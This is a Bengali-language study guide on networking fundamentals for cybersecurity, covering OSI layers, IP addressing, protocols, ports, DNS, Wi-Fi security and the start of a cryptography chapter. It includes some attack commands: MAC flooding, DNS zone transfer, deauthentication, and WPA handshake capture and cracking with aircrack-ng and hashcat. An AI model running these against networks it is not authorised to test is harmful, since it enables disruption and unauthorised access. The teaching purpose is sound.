🛡️
Cyber Security Series

সাইবার সিকিউরিটির জন্য

নেটওয়ার্কিং ফান্ডামেন্টাল

একজন সাইবার সিকিউরিটি প্রফেশনাল হতে হলে নেটওয়ার্কিংয়ের যা যা জানা দরকার — OSI মডেল থেকে শুরু করে ফায়ারওয়াল, VPN, প্রোটোকল, ক্রিপ্টোগ্রাফি পর্যন্ত সব কিছু বিস্তারিত।

🔰 Beginner থেকে Advanced 📚 সম্পূর্ণ বাংলায় 🔒 Security Focused 💻 Hands-on Examples

📋 বিষয়সূচি

অধ্যায় ১ — নেটওয়ার্কিং এর মূল ধারণা
নেটওয়ার্ক কী, নেটওয়ার্কের প্রকারভেদ
নেটওয়ার্ক টপোলজি
ডেটা ট্রান্সমিশন মিডিয়া
অধ্যায় ২ — OSI ও TCP/IP মডেল
OSI মডেলের ৭টি লেয়ার বিস্তারিত
TCP/IP মডেল
Data Encapsulation
অধ্যায় ৩ — IP অ্যাড্রেসিং
IPv4 ও IPv6 বিস্তারিত
সাবনেটিং ও CIDR
Public vs Private IP, NAT
অধ্যায় ৪ — গুরুত্বপূর্ণ প্রোটোকল১১
TCP vs UDP
HTTP/HTTPS, DNS, DHCP, FTP, SSH, SMTP
গুরুত্বপূর্ণ পোর্ট নম্বর
অধ্যায় ৫ — নেটওয়ার্ক ডিভাইস১৪
Hub, Switch, Router, Gateway
Firewall, IDS/IPS, Proxy
অধ্যায় ৬ — DNS বিস্তারিত১৬
DNS কীভাবে কাজ করে, Record Types
DNS অ্যাটাক ও সুরক্ষা
অধ্যায় ৭ — ওয়্যারলেস নেটওয়ার্কিং১৮
WiFi স্ট্যান্ডার্ড, WPA2/WPA3
ওয়্যারলেস অ্যাটাক ও সুরক্ষা
অধ্যায় ৮ — ক্রিপ্টোগ্রাফি২০
Symmetric ও Asymmetric Encryption
TLS/SSL, PKI, Certificate
Hashing ও Digital Signature
অধ্যায় ৯ — নেটওয়ার্ক সিকিউরিটি কনসেপ্ট২৩
Firewall Rules, VPN, Zero Trust
Common Network Attacks
অধ্যায় ১০ — নেটওয়ার্ক অ্যানালাইসিস টুল২৬
Wireshark, Nmap, Netcat, tcpdump
প্যাকেট অ্যানালাইসিস
CHAPTER 01
🌐 নেটওয়ার্কিংয়ের মূল ধারণা

নেটওয়ার্ক কী?

নেটওয়ার্ক হলো দুই বা তার বেশি কম্পিউটার বা ডিভাইসের সমষ্টি যারা একে অপরের সাথে যোগাযোগ করতে পারে এবং রিসোর্স শেয়ার করতে পারে। উদাহরণস্বরূপ: তোমার বাড়ির WiFi নেটওয়ার্কে মোবাইল, ল্যাপটপ ও স্মার্ট টিভি একসাথে ইন্টারনেট ব্যবহার করে — এটাই একটি নেটওয়ার্ক।

নেটওয়ার্কের প্রকারভেদ

ধরনপূর্ণ নামপরিসরউদাহরণসিকিউরিটি ঝুঁকি
PANPersonal Area Network১০ মিটারBluetooth, USBBluetooth sniffing
LANLocal Area Network১ ভবনঅফিস নেটওয়ার্কARP Spoofing, MITM
MANMetropolitan Area Networkএকটি শহরISP নেটওয়ার্কBGP Hijacking
WANWide Area Networkদেশ/বিশ্বইন্টারনেটসব ধরনের অ্যাটাক
WLANWireless LAN১ ভবনWiFi নেটওয়ার্কEvil Twin, Deauth
VPNVirtual Private NetworkযেকোনোRemote workVPN misconfiguration

নেটওয়ার্ক টপোলজি

টপোলজি হলো নেটওয়ার্কের ডিভাইসগুলো কীভাবে সংযুক্ত — এই বিন্যাস। সিকিউরিটির দৃষ্টিকোণ থেকে টপোলজি বোঝা গুরুত্বপূর্ণ কারণ এটি ব্যর্থতার সম্ভাব্য পয়েন্ট (Single Point of Failure) নির্ধারণ করে।

⭐ Star Topology

সব ডিভাইস একটি কেন্দ্রীয় Switch/Hub-এর সাথে সংযুক্ত।

সুবিধা: একটি সংযোগ ব্যর্থ হলে অন্যরা চলে

ঝুঁকি: কেন্দ্রীয় Switch হ্যাক হলে পুরো নেটওয়ার্ক ঝুঁকিতে

ব্যবহার: বেশিরভাগ অফিস LAN

🔵 Bus Topology

সব ডিভাইস একটি মূল তার (Backbone) এর সাথে সংযুক্ত।

সুবিধা: সহজ ও কম খরচ

ঝুঁকি: Packet Sniffing খুব সহজ — যে কেউ সব ট্র্যাফিক দেখতে পারে

ব্যবহার: পুরনো নেটওয়ার্ক

💍 Ring Topology

ডিভাইসগুলো বৃত্তাকারে সংযুক্ত।

সুবিধা: ডেটা সংঘর্ষ কম

ঝুঁকি: একটি সংযোগ ভাঙলে পুরো নেটওয়ার্ক বিচ্ছিন্ন

ব্যবহার: Token Ring (পুরনো)

🕸️ Mesh Topology

প্রতিটি ডিভাইস অন্য সবার সাথে সংযুক্ত।

সুবিধা: অত্যন্ত নির্ভরযোগ্য, রিডান্ডেন্ট পাথ

ঝুঁকি: জটিল, ব্যবস্থাপনা কঠিন

ব্যবহার: ইন্টারনেট ব্যাকবোন, মিলিটারি নেটওয়ার্ক

ডেটা ট্রান্সমিশন মিডিয়া

তারযুক্ত মিডিয়া (Wired)

মিডিয়াগতিদূরত্বসিকিউরিটি ঝুঁকি
Twisted Pair (UTP/STP)১০Mbps - ১০Gbps১০০ মিটারPhysical tapping সম্ভব
Coaxial Cable১০Mbps - ১Gbps৫০০ মিটারEavesdropping সহজ
Fiber Optic১Gbps - ১০০Tbpsকিলোমিটারসবচেয়ে নিরাপদ, tap করা কঠিন

তারবিহীন মিডিয়া (Wireless)

মিডিয়াফ্রিকোয়েন্সিপরিসরসিকিউরিটি ঝুঁকি
WiFi (802.11)2.4 GHz / 5 GHz৩০-১০০ মিটারEvil Twin, Deauth Attack
Bluetooth2.4 GHz১০-১০০ মিটারBluejacking, Bluesnarfing
Cellular (4G/5G)700MHz-6GHzকিলোমিটারIMSI Catcher, SS7 Attack
MicrowaveGHz রেঞ্জকিলোমিটারSignal Interception
SatelliteGHz রেঞ্জবৈশ্বিকSignal Spoofing
🔒 সিকিউরিটি নোট
Wireless মিডিয়া সবচেয়ে বেশি ঝুঁকিপূর্ণ কারণ সংকেত বাতাসের মধ্য দিয়ে যায় এবং যে কেউ ধরতে পারে। Fiber Optic সবচেয়ে নিরাপদ কারণ আলোক সংকেত বাঁকানো ছাড়া ধরা প্রায় অসম্ভব এবং tap করলে সংযোগ বিচ্ছিন্ন হয়।
CHAPTER 02
📚 OSI ও TCP/IP মডেল

OSI মডেল কী?

OSI (Open Systems Interconnection) মডেল হলো নেটওয়ার্ক যোগাযোগের একটি কনসেপচুয়াল ফ্রেমওয়ার্ক যা ISO তৈরি করেছে। এটি নেটওয়ার্ক ফাংশনকে ৭টি লেয়ারে ভাগ করে। সাইবার সিকিউরিটিতে প্রতিটি লেয়ারে আলাদা ধরনের অ্যাটাক হয়।

┌─────────────────────────────────────────────────────┐
│  লেয়ার ৭ │  Application Layer  │  HTTP, FTP, DNS   │
├─────────────────────────────────────────────────────┤
│  লেয়ার ৬ │  Presentation Layer │  SSL/TLS, JPEG    │
├─────────────────────────────────────────────────────┤
│  লেয়ার ৫ │  Session Layer      │  NetBIOS, RPC     │
├─────────────────────────────────────────────────────┤
│  লেয়ার ৪ │  Transport Layer    │  TCP, UDP         │
├─────────────────────────────────────────────────────┤
│  লেয়ার ৩ │  Network Layer      │  IP, ICMP, ARP    │
├─────────────────────────────────────────────────────┤
│  লেয়ার ২ │  Data Link Layer    │  Ethernet, MAC    │
├─────────────────────────────────────────────────────┤
│  লেয়ার ১ │  Physical Layer     │  Cables, Signals  │
└─────────────────────────────────────────────────────┘

লেয়ার ১ — Physical Layer (ভৌত স্তর)

কাজ: বিট (0 ও 1) কে ইলেকট্রিক সিগন্যাল, আলো বা রেডিও তরঙ্গে রূপান্তর করে পাঠানো।

লেয়ার ২ — Data Link Layer (ডেটা লিংক স্তর)

কাজ: নোড থেকে নোডে ডেটা ফ্রেম পাঠানো। MAC Address ব্যবহার করে।

⚠️ ARP Spoofing — সবচেয়ে বিপজ্জনক লেয়ার ২ অ্যাটাক
হ্যাকার নকল ARP Reply পাঠিয়ে বলে "আমিই গেটওয়ে!" — ফলে সব ট্র্যাফিক হ্যাকারের মধ্য দিয়ে যায়। এটি Man-in-the-Middle অ্যাটাকের ভিত্তি।

লেয়ার ৩ — Network Layer (নেটওয়ার্ক স্তর)

কাজ: সোর্স থেকে ডেস্টিনেশনে প্যাকেট রাউটিং করা। IP Address ব্যবহার করে।

লেয়ার ৪ — Transport Layer (ট্রান্সপোর্ট স্তর)

কাজ: End-to-end যোগাযোগ নিশ্চিত করা। পোর্ট নম্বর ব্যবহার করে।

লেয়ার ৫, ৬, ৭ — Session, Presentation, Application

লেয়ারকাজপ্রোটোকলঅ্যাটাক
Session (৫)সংযোগ স্থাপন ও শেষ করাNetBIOS, RPC, NFSSession Hijacking, Pass-the-Hash
Presentation (৬)ডেটা এনকোড/ডিকোড, এনক্রিপশনSSL/TLS, JPEG, ASCIISSL Stripping, Cipher Downgrade
Application (৭)ইউজার অ্যাপ্লিকেশন সেবাHTTP, FTP, DNS, SMTPSQLi, XSS, DNS Spoofing, Phishing

TCP/IP মডেল

TCP/IP মডেল বাস্তবে ইন্টারনেটে ব্যবহৃত হয়। এটি OSI-এর ৭ লেয়ারকে ৪ লেয়ারে সংকুচিত করে।

TCP/IP লেয়ারOSI সমতুল্যপ্রোটোকল
Applicationলেয়ার ৫, ৬, ৭HTTP, HTTPS, DNS, FTP, SSH, SMTP, POP3
Transportলেয়ার ৪TCP, UDP
Internetলেয়ার ৩IP, ICMP, ARP, OSPF, BGP
Network Accessলেয়ার ১, ২Ethernet, WiFi, PPP

Data Encapsulation — ডেটা কীভাবে যায়?

পাঠানোর সময় (Sender):
Application Data: [DATA]
Transport adds header: [TCP Header][DATA]              → Segment
Network adds header:   [IP Header][TCP Header][DATA]   → Packet
Data Link adds frame:  [ETH][IP][TCP][DATA][FCS]       → Frame
Physical:              0101010101... (bits)              → Bits

পাওয়ার সময় (Receiver):
বিপরীত ক্রমে প্রতিটি লেয়ার Header খুলে ফেলে।
✅ মনে রাখার সহজ উপায়
OSI মডেল মনে রাখতে: "Please Do Not Throw Sausage Pizza Away"
P=Physical, D=Data Link, N=Network, T=Transport, S=Session, P=Presentation, A=Application
CHAPTER 03
🔢 IP অ্যাড্রেসিং ও সাবনেটিং

IP Address কী?

IP (Internet Protocol) Address হলো প্রতিটি নেটওয়ার্ক ডিভাইসের একটি অনন্য পরিচয়পত্র। ঠিক যেমন বাড়ির ঠিকানা দিয়ে চিঠি পাঠানো হয়, তেমনি IP Address দিয়ে ডেটা প্যাকেট পাঠানো হয়।

IPv4 বিস্তারিত

IPv4 হলো ৩২-বিটের একটি সংখ্যা যা ৪টি অক্টেটে (৮ বিট করে) লেখা হয়।

উদাহরণ: 192.168.1.100

বাইনারি:
11000000 . 10101000 . 00000001 . 01100100
   192   .    168   .     1    .    100

মোট বিট: 32
মোট সম্ভাব্য IP: 2^32 = প্রায় ৪.৩ বিলিয়ন

IPv4 ক্লাস

ক্লাসরেঞ্জডিফল্ট Subnet Maskব্যবহারহোস্ট সংখ্যা
A1.0.0.0 – 126.255.255.255255.0.0.0 (/8)বড় সংস্থা১৬,৭৭৭,২১৪
B128.0.0.0 – 191.255.255.255255.255.0.0 (/16)মাঝারি সংস্থা৬৫,৫৩৪
C192.0.0.0 – 223.255.255.255255.255.255.0 (/24)ছোট নেটওয়ার্ক২৫৪
D224.0.0.0 – 239.255.255.255Multicast
E240.0.0.0 – 255.255.255.255Research/Reserved

Private vs Public IP Address

ধরনরেঞ্জব্যবহারসিকিউরিটি
Private A10.0.0.0/8বড় কর্পোরেট নেটওয়ার্কইন্টারনেট থেকে সরাসরি অ্যাক্সেসযোগ্য নয়
Private B172.16.0.0/12মাঝারি নেটওয়ার্কইন্টারনেট থেকে সরাসরি অ্যাক্সেসযোগ্য নয়
Private C192.168.0.0/16হোম/অফিস নেটওয়ার্কইন্টারনেট থেকে সরাসরি অ্যাক্সেসযোগ্য নয়
Loopback127.0.0.1নিজের সাথে যোগাযোগlocalhost — শুধু নিজের সিস্টেম
APIPA169.254.0.0/16DHCP না পেলেDHCP Server সমস্যার নির্দেশক
Public IPবাকি সবইন্টারনেটসরাসরি অ্যাক্সেসযোগ্য — সুরক্ষা প্রয়োজন

NAT (Network Address Translation)

NAT হলো এমন একটি পদ্ধতি যেখানে Router একটি Public IP দিয়ে অনেকগুলো Private IP ডিভাইসকে ইন্টারনেট অ্যাক্সেস দেয়।

তোমার বাড়ির নেটওয়ার্ক:
মোবাইল: 192.168.1.2  ──┐
ল্যাপটপ: 192.168.1.3  ──┤──→ Router (NAT) ──→ Internet
স্মার্ট TV: 192.168.1.4 ──┘     Public IP: 103.x.x.x

বাইরে থেকে শুধু 103.x.x.x দেখা যায়।
কে কোন ডিভাইস সেটা লুকানো থাকে।

সাবনেটিং (Subnetting)

সাবনেটিং হলো একটি বড় নেটওয়ার্ককে ছোট ছোট অংশে (সাবনেট) ভাগ করা। সিকিউরিটির জন্য এটি অত্যন্ত গুরুত্বপূর্ণ কারণ আলাদা ডিপার্টমেন্টকে আলাদা সাবনেটে রাখলে একটি হ্যাক হলে অন্যটি সুরক্ষিত থাকে।

CIDR Notation (সিডার নোটেশন)

CIDRSubnet Maskমোট IPব্যবহারযোগ্য Hostব্যবহার
/8255.0.0.0১৬,৭৭৭,২১৬১৬,৭৭৭,২১৪বিশাল ISP নেটওয়ার্ক
/16255.255.0.0৬৫,৫৩৬৬৫,৫৩৪বড় কর্পোরেট
/24255.255.255.0২৫৬২৫৪সাধারণ অফিস/হোম
/25255.255.255.128১২৮১২৬বিভাগীয় নেটওয়ার্ক
/30255.255.255.252Router-to-Router Link
/32255.255.255.255একটি নির্দিষ্ট Host

IPv6 বিস্তারিত

IPv4 ঠিকানা শেষ হয়ে যাওয়ায় IPv6 তৈরি হয়েছে। এটি ১২৮-বিটের।

IPv6 উদাহরণ:
2001:0db8:85a3:0000:0000:8a2e:0370:7334

সংক্ষিপ্ত রূপ:
2001:db8:85a3::8a2e:370:7334

মোট সম্ভাব্য IP: 2^128 = 340 undecillion (প্রায় অসীম!)

বিশেষ IPv6 ঠিকানা:
::1          → Loopback (127.0.0.1 এর মতো)
::           → Unspecified
fe80::/10    → Link-local
ff00::/8     → Multicast

IPv4 vs IPv6 তুলনা

বিষয়IPv4IPv6
বিট সংখ্যা32 bit128 bit
ঠিকানা সংখ্যা~৪.৩ বিলিয়ন340 undecillion
NAT প্রয়োজন?হ্যাঁনা
IPsec বাধ্যতামূলক?নাহ্যাঁ
Header সাইজVariableFixed (40 bytes)
Broadcastআছেনেই (Multicast আছে)
সিকিউরিটি ঝুঁকিARP SpoofingNDP Spoofing, Router Advertisement Attack
⚠️ সিকিউরিটি পেনটেস্টিং টিপ
IP স্ক্যান করার সময় IPv6 ভুলে যাবে না! অনেক সিস্টেম IPv6 দিয়ে চলে কিন্তু Firewall শুধু IPv4 ব্লক করে। IPv6 দিয়ে bypass করা যেতে পারে।
nmap -6 target.com # IPv6 স্ক্যান
CHAPTER 04
📡 গুরুত্বপূর্ণ নেটওয়ার্ক প্রোটোকল

TCP vs UDP — সবচেয়ে গুরুত্বপূর্ণ পার্থক্য

🔵 TCP (Transmission Control Protocol)

Connection-oriented — আগে সংযোগ স্থাপন করে

  • Three-Way Handshake: SYN → SYN-ACK → ACK
  • নির্ভরযোগ্য — প্যাকেট হারিয়ে গেলে পুনরায় পাঠায়
  • ক্রমানুযায়ী ডেটা পৌঁছানো নিশ্চিত করে
  • ধীরগতি কিন্তু নির্ভরযোগ্য
  • ব্যবহার: HTTP, HTTPS, FTP, SSH, SMTP

সিকিউরিটি ঝুঁকি: SYN Flood, Session Hijacking

🟠 UDP (User Datagram Protocol)

Connectionless — সংযোগ ছাড়াই পাঠায়

  • কোনো Handshake নেই
  • অনির্ভরযোগ্য — হারানো প্যাকেট পুনরায় পাঠায় না
  • ক্রম নিশ্চিত নয়
  • দ্রুতগতি
  • ব্যবহার: DNS, DHCP, VoIP, Video streaming, Gaming

সিকিউরিটি ঝুঁকি: UDP Flood, DNS Amplification

TCP Three-Way Handshake বিস্তারিত

Client                    Server
  |                          |
  |──── SYN (seq=100) ──────→|   "হ্যালো, কথা বলতে চাই"
  |                          |
  |←── SYN-ACK (seq=200, ───|   "ঠিক আছে, প্রস্তুত আছি"
  |     ack=101)             |
  |                          |
  |──── ACK (ack=201) ──────→|   "চমৎকার, শুরু করা যাক"
  |                          |
  |═══════ Data Flow ════════|

SYN Flood Attack:
Client (Hacker)           Server
  |──── SYN ───────────────→|
  |──── SYN ───────────────→|  সার্ভার অনেক SYN-ACK
  |──── SYN ───────────────→|  পাঠায় কিন্তু ACK আসে না
  |──── SYN ───────────────→|  → সার্ভারের মেমোরি ভরে যায়
  |                          |  → Legitimate connection reject করে

HTTP ও HTTPS

HTTP (HyperText Transfer Protocol) — পোর্ট 80

ওয়েব ব্রাউজার ও ওয়েব সার্ভারের মধ্যে যোগাযোগের প্রোটোকল। HTTP সম্পূর্ণ অনিরাপদ — সব ডেটা Plaintext-এ যায়।

# HTTP Request উদাহরণ (Wireshark-এ দেখা যায়): GET /login HTTP/1.1 Host: example.com Cookie: session=abc123 Authorization: Basic dXNlcjpwYXNz # Base64 encoded "user:pass" # HTTP Response: HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: sessionid=xyz789; HttpOnly; Secure

HTTPS — পোর্ট 443

HTTP + TLS/SSL = HTTPS। ডেটা এনক্রিপ্ট করে পাঠায়। সিকিউরিটির জন্য সব সাইটে HTTPS থাকা উচিত।

বিষয়HTTPHTTPS
পোর্ট80443
এনক্রিপশননেইTLS/SSL
Wireshark-এ দেখা যায়?হ্যাঁনা (encrypted)
CertificateনেইSSL Certificate প্রয়োজন
MITM সম্ভব?সহজেইকঠিন (Certificate pinning থাকলে)

DNS — ডোমেইন নেম সিস্টেম (পোর্ট 53)

DNS ইন্টারনেটের ফোনবুক। Domain Name কে IP Address-এ রূপান্তর করে।

nslookup google.com # DNS লুকআপ dig google.com ANY # সব DNS রেকর্ড দেখা host -a facebook.com # DNS রেকর্ড বিস্তারিত

DHCP — ডায়নামিক হোস্ট কনফিগারেশন (পোর্ট 67/68)

DHCP স্বয়ংক্রিয়ভাবে নেটওয়ার্ক ডিভাইসকে IP Address, Subnet Mask, Default Gateway ও DNS দেয়।

DHCP DORA Process:
Client              DHCP Server
  |─── Discover ──────────→|   "কেউ IP দেবে?"
  |←── Offer ─────────────|   "192.168.1.100 নাও"
  |─── Request ───────────→|   "ঠিক আছে, ওটাই চাই"
  |←── ACK ───────────────|   "নাও, লিজ দিলাম"

DHCP Starvation Attack:
হ্যাকার লক্ষ লক্ষ Discover পাঠিয়ে সব IP নিয়ে নেয়
→ নতুন ডিভাইস IP পায় না → DoS

SSH — সিকিউর শেল (পোর্ট 22)

SSH এনক্রিপ্টেড কমান্ড-লাইন অ্যাক্সেস দেয়। Telnet (পোর্ট 23) এর নিরাপদ বিকল্প।

# SSH সংযোগ ssh username@192.168.1.100 ssh -p 2222 user@server.com # কাস্টম পোর্ট ssh -i key.pem user@server # Private key দিয়ে # SSH Key তৈরি ssh-keygen -t ed25519 -C "comment" # সিকিউরিটি: SSH Config পরিবর্তন # /etc/ssh/sshd_config: PermitRootLogin no PasswordAuthentication no Port 2222

গুরুত্বপূর্ণ পোর্ট নম্বর — সম্পূর্ণ তালিকা

পোর্টপ্রোটোকলসার্ভিসসিকিউরিটি নোট
20/21TCPFTPPlaintext, ব্যবহার করবেন না। SFTP ব্যবহার করুন।
22TCPSSHনিরাপদ। Default পোর্ট পরিবর্তন করুন।
23TCPTelnetঅত্যন্ত অনিরাপদ, ব্যবহার করবেন না!
25TCPSMTPইমেইল পাঠানো। Spam ও Email Spoofing ঝুঁকি।
53TCP/UDPDNSDNS Spoofing, DNS Amplification Attack ঝুঁকি।
67/68UDPDHCPRogue DHCP Server, Starvation Attack ঝুঁকি।
80TCPHTTPPlaintext ওয়েব। HTTPS ব্যবহার করুন।
110TCPPOP3ইমেইল রিসিভ। Plaintext।
135TCPRPCWindows। অনেক Exploit পাওয়া গেছে।
139/445TCPSMBEternalBlue (WannaCry)! সবচেয়ে বিপজ্জনক।
143TCPIMAPইমেইল। SSL ছাড়া Plaintext।
443TCPHTTPSনিরাপদ ওয়েব।
445TCPSMB/CIFSWindows File Sharing। খুবই বিপজ্জনক!
3306TCPMySQLডেটাবেস। কখনো Public-এ খোলা রাখবেন না।
3389TCPRDPRemote Desktop। Brute Force ও BlueKeep ঝুঁকি।
5432TCPPostgreSQLডেটাবেস। Public-এ expose করবেন না।
6379TCPRedisপ্রায়ই Auth ছাড়া Public-এ খোলা থাকে!
8080/8443TCPHTTP AltDevelopment Server, প্রায়ই দুর্বল।
27017TCPMongoDBপ্রায়ই Auth ছাড়া Public-এ খোলা থাকে!
CHAPTER 05
🖥️ নেটওয়ার্ক ডিভাইস

প্রধান নেটওয়ার্ক ডিভাইস

Hub — লেয়ার ১

Hub সব পোর্টে ডেটা ব্রডকাস্ট করে। সিকিউরিটির দৃষ্টিকোণ থেকে অত্যন্ত বিপজ্জনক কারণ যেকোনো ডিভাইস সব ট্র্যাফিক দেখতে পারে। আধুনিক নেটওয়ার্কে Hub ব্যবহার হয় না।

Switch — লেয়ার ২

Switch MAC Address টেবিল ব্যবহার করে সঠিক পোর্টে ডেটা পাঠায়। Hub-এর চেয়ে নিরাপদ কিন্তু ARP Spoofing ও MAC Flooding-এর মাধ্যমে আক্রান্ত হতে পারে।

⚠️ MAC Flooding Attack
হ্যাকার হাজার হাজার নকল MAC Address দিয়ে Switch-এর CAM Table ভরিয়ে দেয়। ফলে Switch একটি Hub-এর মতো আচরণ করে এবং সব ট্র্যাফিক সব পোর্টে ব্রডকাস্ট করে।
macof -i eth0 # MAC Flooding টুল (Kali Linux)

Router — লেয়ার ৩

Router নেটওয়ার্কের মধ্যে ট্র্যাফিক রাউটিং করে। IP Address ব্যবহার করে সেরা পাথ নির্ধারণ করে।

Firewall — সবচেয়ে গুরুত্বপূর্ণ সিকিউরিটি ডিভাইস

Firewall নেটওয়ার্ক ট্র্যাফিক ফিল্টার করে। নির্দিষ্ট নিয়ম (Rules) অনুযায়ী ট্র্যাফিক Allow বা Block করে।

Firewall ধরনকাজসুবিধাসীমাবদ্ধতা
Packet FilterIP, Port দেখে block করেদ্রুতDeep inspection করে না
StatefulConnection state ট্র্যাক করেনির্ভরযোগ্যApplication layer দেখে না
Application (WAF)HTTP payload বিশ্লেষণ করেসবচেয়ে নিরাপদধীরগতি, ব্যয়বহুল
Next-Gen (NGFW)সব একসাথে + IDS/IPSসর্বোচ্চ সুরক্ষাসবচেয়ে ব্যয়বহুল

IDS ও IPS

বিষয়IDS (Intrusion Detection System)IPS (Intrusion Prevention System)
কাজঅ্যাটাক সনাক্ত করে Alert পাঠায়অ্যাটাক সনাক্ত করে স্বয়ংক্রিয়ভাবে ব্লক করে
পজিশননেটওয়ার্কের বাইরে (Passive)ট্র্যাফিকের মাঝে (Inline)
সুবিধাFalse Positive-এ ক্ষতি নেইReal-time সুরক্ষা
সীমাবদ্ধতানিজে block করতে পারে নাFalse Positive হলে legitimate traffic block

Proxy Server

Proxy হলো মধ্যবর্তী সার্ভার যা Client ও Internet-এর মধ্যে কাজ করে।

CHAPTER 06
🔍 DNS বিস্তারিত

DNS কীভাবে কাজ করে?

তুমি browser-এ টাইপ করলে: www.google.com

১. Browser Cache চেক করে
          ↓ না পেলে
২. OS Cache (/etc/hosts) চেক করে
          ↓ না পেলে
৩. Recursive Resolver (ISP DNS) কে জিজ্ঞেস করে
          ↓ না জানলে
৪. Root DNS Server (.) জিজ্ঞেস করে → .com কে জানে
          ↓
৫. TLD DNS Server (.com) জিজ্ঞেস করে → google.com কে জানে
          ↓
৬. Authoritative DNS Server (Google) → 142.250.x.x
          ↓
৭. Browser পায় IP: 142.250.x.x
          ↓
৮. Browser connect করে 142.250.x.x:443 এ

DNS Record Types

Recordকাজউদাহরণসিকিউরিটি প্রাসঙ্গিকতা
ADomain → IPv4google.com → 142.250.x.xসবচেয়ে বেশি ব্যবহৃত, Subdomain Takeover
AAAADomain → IPv6google.com → 2607:f8b0::...IPv6 হ্যাকিং
CNAMEAlias → অন্য Domainwww → google.comSubdomain Takeover ঝুঁকি
MXMail Servermail.google.comEmail Spoofing, SPF/DKIM চেক
TXTটেক্সট তথ্যSPF, DKIM, DMARC রেকর্ডEmail authentication
NSName Serverns1.google.comDNS Hijacking টার্গেট
PTRIP → Domain (Reverse)142.250.x.x → google.comReverse DNS lookup
SOADNS Zone তথ্যZone transfer infoZone Transfer Attack
SRVService Location_http._tcp.example.comService Discovery

DNS অ্যাটাক

১. DNS Spoofing / Cache Poisoning

হ্যাকার DNS Cache-এ ভুয়া রেকর্ড ঢুকিয়ে দেয়। ব্যবহারকারী সঠিক domain টাইপ করলেও হ্যাকারের সার্ভারে চলে যায়।

২. DNS Zone Transfer

Zone Transfer ভুলভাবে কনফিগার থাকলে সব DNS রেকর্ড (সব subdomain সহ) একসাথে বের করা যায়।

dig axfr @ns1.target.com target.com # Zone Transfer চেষ্টা

৩. DNS Amplification DDoS

UDP-র spoofed packet দিয়ে DNS সার্ভারকে victim-এর IP-তে বড় Response পাঠাতে বলে। ছোট request-এ বড় response → ট্র্যাফিক amplification।

৪. DNS Tunneling

Firewall bypass করতে DNS প্যাকেটের মধ্যে ডেটা লুকিয়ে পাঠানো।

# DNS Enumeration টুল (Kali Linux) dnsenum target.com fierce --domain target.com dnsrecon -d target.com subfinder -d target.com
✅ DNS সুরক্ষা
  • DNSSEC ব্যবহার করুন (DNS রেকর্ড সাইন করা)
  • Zone Transfer শুধু Authorized Server-এ সীমিত করুন
  • SPF, DKIM, DMARC রেকর্ড যোগ করুন (Email Spoofing ঠেকাতে)
  • DNS over HTTPS (DoH) বা DNS over TLS (DoT) ব্যবহার করুন
CHAPTER 07
📶 ওয়্যারলেস নেটওয়ার্কিং ও সিকিউরিটি

WiFi স্ট্যান্ডার্ড

স্ট্যান্ডার্ডনামফ্রিকোয়েন্সিসর্বোচ্চ গতিপরিসর
802.11aWiFi 15 GHz54 Mbpsকম
802.11bWiFi 22.4 GHz11 Mbpsবেশি
802.11gWiFi 32.4 GHz54 Mbpsবেশি
802.11nWiFi 42.4/5 GHz600 Mbpsবেশি
802.11acWiFi 55 GHz3.5 Gbpsমাঝারি
802.11axWiFi 62.4/5/6 GHz9.6 Gbpsভালো

WiFi সিকিউরিটি প্রোটোকল

WEP (Wired Equivalent Privacy) — ব্যবহার করবেন না!

১৯৯৭ সালে তৈরি। RC4 encryption ব্যবহার করে। মাত্র কয়েক মিনিটে crack করা যায়।

aircrack-ng capture.cap # WEP crack (Kali Linux) — মিনিটেই ভাঙে

WPA (WiFi Protected Access)

WEP-এর উন্নত বিকল্প। TKIP encryption ব্যবহার করে। এখনো দুর্বল।

WPA2 — সবচেয়ে বেশি ব্যবহৃত

AES-CCMP encryption ব্যবহার করে। দুটি মোড:

দুর্বলতা: PMKID ও 4-Way Handshake ক্যাপচার করে offline brute force।

WPA3 — সর্বশেষ ও সবচেয়ে নিরাপদ

SAE (Simultaneous Authentication of Equals) ব্যবহার করে। Dictionary Attack প্রতিরোধ করে।

ওয়্যারলেস অ্যাটাক

১. Evil Twin Attack

আসল AP: "HomeWiFi" (BSSID: AA:BB:CC)
হ্যাকারের AP: "HomeWiFi" (জোরালো সিগন্যাল দিয়ে)

ব্যবহারকারীর ডিভাইস হ্যাকারের AP-তে connect করে
→ সব ট্র্যাফিক হ্যাকারের মধ্য দিয়ে যায়
→ Captive portal দেখিয়ে পাসওয়ার্ড চুরি

২. Deauthentication Attack

802.11 Management Frame-এ authentication নেই। হ্যাকার Deauth Frame পাঠিয়ে সব ডিভাইস disconnect করতে পারে। এরপর WPA Handshake ক্যাপচার করা যায়।

airmon-ng start wlan0 # Monitor mode চালু airodump-ng wlan0mon # নেটওয়ার্ক স্ক্যান aireplay-ng --deauth 100 -a [BSSID] wlan0mon # Deauth Attack

৩. WPA Handshake Capture ও Crack

# Handshake ক্যাপচার airodump-ng -c [channel] --bssid [BSSID] -w capture wlan0mon # Crack করা (Dictionary Attack) aircrack-ng -w rockyou.txt capture.cap hashcat -m 22000 capture.hc22000 rockyou.txt
✅ ওয়্যারলেস সিকিউরিটি টিপস
  • WPA3 ব্যবহার করুন বা WPA2 AES
  • দীর্ঘ ও জটিল WiFi পাসওয়ার্ড ব্যবহার করুন (২০+ অক্ষর)
  • SSID Broadcast বন্ধ করুন (কিছুটা সুরক্ষা দেয়)
  • MAC Filtering চালু করুন (100% নিরাপদ নয়, কিন্তু অতিরিক্ত স্তর)
  • Guest Network আলাদা রাখুন
  • WiFi Analyzer দিয়ে নিয়মিত পার্শ্ববর্তী নেটওয়ার্ক মনিটর করুন
CHAPTER 08
🔐 ক্রিপ্টোগ্রাফি

ক্রিপ্টোগ্রাফি কী?

ক্রিপ্টোগ্রাফি হলো তথ্য এনক্রিপ্ট করে অননুমোদিত অ্যাক্সেস থেকে রক্ষা করার বিজ্ঞান। Confidentiality, Integrity, Authentication — তিনটিই নিশ্চিত করে।

Symmetric Encryption (প্রতিসম এনক্রিপশন)

একই Key দিয়ে Encrypt ও Decrypt করা হয়।

Sender                              Receiver
  |                                    |
  | Plain: "Hello"                     |
  | Key: "SecretKey123"                |
  |                                    |
  | Encrypt → "X7$mK9#"  ──────────→ | 
  |                                    | Decrypt (same key)
  |                                    | → "Hello"

সমস্যা: Key কীভাবে নিরাপদে পাঠাবে?
অ্যালগরিদমKey Sizeব্লক Sizeস্ট্যাটাসব্যবহার
DES56-bit64-bit❌ ভাঙা (ব্যবহার করবেন না)পুরনো সিস্টেম
